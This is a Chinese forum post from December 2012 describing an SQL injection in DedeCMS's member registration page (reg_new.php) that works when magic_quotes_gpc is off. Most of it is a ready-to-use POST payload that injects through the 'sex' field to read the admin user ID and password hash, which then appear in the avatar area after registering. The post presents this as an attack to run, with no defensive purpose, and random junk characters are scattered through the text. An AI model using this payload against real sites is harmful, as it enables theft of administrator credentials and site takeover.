dedecms版本 201211223 h E$ S( u+ K; P1 a% Q6 Y
. X. R0 H) M- f! z( V* n" g
需要magic_quotes_gpc=Off
$ K4 y" p5 i$ \# ]. C' Z+ G9 c' f
应该是没有什么大危害的漏洞.
% S7 @- D0 O. w原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
0 v/ S0 Q D* v. {7 F3 i" x' A$ I) h. n
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.0 b. ~0 R8 G. R& H" X# {7 ~
POST提交以下数据,其实不用POST提交的,这样隐蔽点.! Q9 V3 a5 W" c3 N( C+ Z; ?4 _
4 ^6 E4 E! V. ~6 ?
http:///de/member/reg_new.php
4 ~# c! \- E' j: g# ?: c
$ N: j$ _, a1 s# ^6 o9 P( iPOST$ C9 Z& }! x/ X$ m
/ S9 i V z: Y" v7 g2 _( c5 _
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=, `% @+ Z; p& g: M R: T/ ~
' P2 e$ }/ c6 C; v& h4 r, s; D/ f成功注册后,头像处里面有好玩的信息./ w, o; }9 ^3 H( |$ U( j- s
+ [: P" v9 }3 B |
发表于 2012-12-5 10:03:32
收藏
支持
反对